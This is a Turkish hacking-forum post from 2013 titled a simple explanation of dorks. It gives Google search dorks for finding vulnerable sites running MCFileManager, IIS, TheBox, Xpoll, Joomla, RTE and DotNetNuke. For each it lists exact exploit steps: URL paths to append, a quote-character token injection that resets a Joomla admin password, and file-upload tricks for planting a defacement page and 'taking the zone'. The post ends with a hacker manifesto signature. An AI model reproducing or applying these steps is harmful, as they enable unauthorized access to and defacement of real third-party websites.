THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Dorkların Basit Anlatımı

AdamPro12 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Mesajlar:
29
Konular:
15
Teşekkür (Etti):
5
Teşekkür (Aldı):
1
Ticaret:
(0) %
13-11-2013 21:39
#1
Smile
Dorkların Basit Anlatımı
1 - [MCFileManager]

Dork

inurl:/tiny_mce/plugins/filemanager/

Yöntem

Dork aratılır . Çıkan sonuçlardan herhangi biri seçilir . URL'den " filemanager/ " den sonraki bölüm silinir . Karşımıza gelen sayfada " Simple Example " yazısının sağ tarafında [MCFileManager] butonu tıklanır . Username password isterse deneme yanılma yapılır . Çıkmazsa index upload edilir .

2 - ISS

Dork

intext:"404 Object Not Found"
Microsoft-IIS/5.0"Microsoft-IIS/* server at"
intitle:index.of"Microsoft-IIS/4.0"
intitle:index.of"Microsoft-IIS/5.0 server at"
intitle:"Welcome to IIS 4.0"
intitle:"Welcome to Windows 2000 Internet Services"

Yöntem

ISS açığı olan site belirlenir , " Bilgisayarım " açılır . Sağ click tıklanır , " Ag Konumu Ekle " tıklanır . İki kere " İleri " tıklanır . " İnternet ya da Ağ Adresi " bölümüne ISS açığı bulunan site yazılır . Bağlantı kurulur . Bağlantı klasörü açılır . İndex içine atılır .

3 - Thebox

Dork

inurl:thebox/thebox.php

Yöntem

Dork aratılır . Çıkan sonuçlardan sonu " /thebox/thebox.php/ " olan bir site seçilir . Site URL'sinin sonuna " /admin.php?act=write&username=hack&password=byqta&a " kodu eklenir . İstenirse direk edit atılır . Aksi halde " View Log " yanındaki " Click Here " butonu tıklanır . İçlerinden herhangi birinin karşısındaki " Edit Shout " tıklanır . İndex kodları yapıştırılır .

4 - Xpoll

Dork

xpoll veya inurl:xpoll/admin/images

Yöntem

Dork aratılır . Çıkan sonuçlardan herhangi biri açılır . Sağ üst köşeden " Delete All İmages " butonu tıklanır . Sonra " Upload An İmage " tıklanır . İndex seçilir . Site URL'sinden " admin " ve " index.php " silinir . İndexe ulaşılır .

6 - Token

Dork

"Joomla Overview site:"
inurl:*quot;com_idoblog*quot;
inurl:"com_idoblog" siterg
inurl:index.php?viewarticle siterg

Yöntem

Dork aratılır . Çıkan sonuçlardan herhangi biri açılır . Site URL'sine " /index.php?option=com_user&view=reset&layout=confir m " kodu yazılır . Token kısmına " ' " yazılır ve " Submit " tıklanır . Password yenileme sayfasına iki yeni password yazılır , password sıfırlanır . Joomla açığı olduğu için panel sabittir , URL sonuna " /administrator " eklenir . Username tahmin işidir . Password ne yazdıysanız odur . Joomla paneline giriş yapılır .

6 - RTE

Dork

inurl:rte/my_********s/my_files/
inurl:/my_********s/my_files/

Yöntem

Dorklar aratılır . Çıkan sonuçlardan herhangi biri açılır . Açılan sitlerin URL'leri " /RTE " yazan yere silinir . Silindikten sonra URL'ye " /rte/RTE_popup_file_atch.asp " kodu yazılır . Çıkan ekrandan index upload edilir . Sağ bölmede gelen URL açılır , zone alınır .

7 - Dotnuke

Dork

inurl:/tabid/36/language/en-US/Default.aspx

Yöntem

Dork aratılır . Çıkan sonuçlardan herhangi biri açılır . Açılan sitelerin URL'lerine " /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx " kodu eklenir , enter tıklanır . Gelen sonuçta üç kutucuktan en alttaki seçilir , sayfa yenilendikten sonra arama çubuğundaki her şey silinir , çubuğa " ************:__doPostBack('ctlURL$cmdUpload','' ) " kodu yazılır . Gelen sayfada .txt olarak index upload edilir . Site URL'sinin sonuna " /Portals/0/index.txt " / " /Portals/1/.txt " kodu eklenir , zone alınır .


Bir ksımı alıntı diğer kısmını ise ben yazdım eğer işinize yaradıysa teşşkür etmeniz yeter
--------------------- Evet, ben bir suçluyum. Benim suçum merak etmek.
Suçum insanları ne söyledikleri ve düşündükleri için yargılamak,
nasıl göründüklerine göre değil. Suçum sizden daha akıllı olmak ki beni asla affetmeyeceksiniz.
Ben bir hacker ım ve bu benim manifestom.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler